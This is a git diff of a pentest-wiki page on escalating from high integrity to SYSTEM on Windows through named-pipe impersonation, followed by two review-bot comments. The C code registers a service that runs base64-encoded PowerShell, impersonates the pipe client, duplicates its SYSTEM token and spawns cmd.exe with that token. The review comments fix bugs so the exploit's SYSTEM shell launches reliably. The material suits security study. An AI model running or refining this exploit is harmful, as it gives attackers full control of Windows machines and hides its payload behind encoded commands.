diff --git a/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md b/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
index f85ab290..b484a68d 100644
--- a/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
+++ b/windows/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
@@ -29,16 +29,16 @@ int ServiceGo(void) { } // create Piper service - scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, - SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, - "C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==", - NULL, NULL, NULL, NULL, NULL); + scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, + SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, + "C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==", + NULL, NULL, NULL, NULL, NULL); if (scService == NULL) { //printf("[!] CreateServiceA() failed: [%d]\n", GetLastError()); return FALSE; } - + // launch it StartService(scService, 0, NULL); @@ -47,12 +47,12 @@ int ServiceGo(void) { DeleteService(scService); CloseServiceHandle(scService); - CloseServiceHandle(scManager); + CloseServiceHandle(scManager); } int main() { - LPCWSTR sPipeName = "\\\\.\\pipe\\piper"; + LPCSTR sPipeName = "\\\\.\\pipe\\piper"; HANDLE hSrvPipe; HANDLE th; BOOL bPipeConn; 
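Review bot: `ServiceGo` still falls off its closing brace right after `CloseServiceHandle(scManager);` without returning a value, even though it is declared `int`, its failure path (in the preceding hunk) explicitly returns `FALSE`, and it is run as a thread routine whose return becomes the thread exit code. Add `return TRUE;` before that `}` so the success path is well-defined and the exit code is meaningful to anyone who later inspects it. The body of `ServiceGo` begins outside this hunk.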
@@ -65,34 +65,34 @@ int main() { PROCESS_INFORMATION pi; // open pipe - hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, - PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL); - + hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, + PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL); + // create and run service - th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) ServiceGo, NULL, 0, 0); - + th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0); + // wait for the connection from the service bPipeConn = ConnectNamedPipe(hSrvPipe, NULL); if (bPipeConn) { ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL); - + // impersonate the service (SYSTEM) if (ImpersonateNamedPipeClient(hSrvPipe) == 0) { return -1; } - + // wait for the service to cleanup WaitForSingleObject(th, INFINITE); - + // get a handle to impersonated token if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) { - return -2; - } + return -2; + } // create new primary token for new process if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, - TokenPrimary, &hNewToken)) { - return -4; + TokenPrimary, &hNewToken)) { + return -4; } //Sleep(20000); @@ -100,14 +100,14 @@ int main() { ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); - if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, NULL, L"cmd.exe", - NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) { + if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL, + NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) { return -5; } - + // revert back to original security context RevertToSelf(); - + } return 0;
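Review bot: The reordered call `CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL, ...)` now passes "cmd.exe" as lpApplicationName, and for that parameter the API does not search PATH — a partial name is completed only against the current drive and directory, so the launch will fail (the `return -5;` path) unless cmd.exe happens to sit in the working directory. Either give the full path, `L"C:\\Windows\\System32\\cmd.exe"`, or keep lpApplicationName NULL and supply the command line from a writable buffer, `WCHAR cmd[] = L"cmd.exe";` passed as the fourth argument, since the function may modify lpCommandLine in place. Independently of that, `hImpToken`, `hNewToken`, `pi.hProcess` and `pi.hThread` are never closed on the success path; a `CloseHandle` for each before `RevertToSelf()` would avoid leaking a SYSTEM-level token handle in a long-lived process. `main` begins outside this hunk.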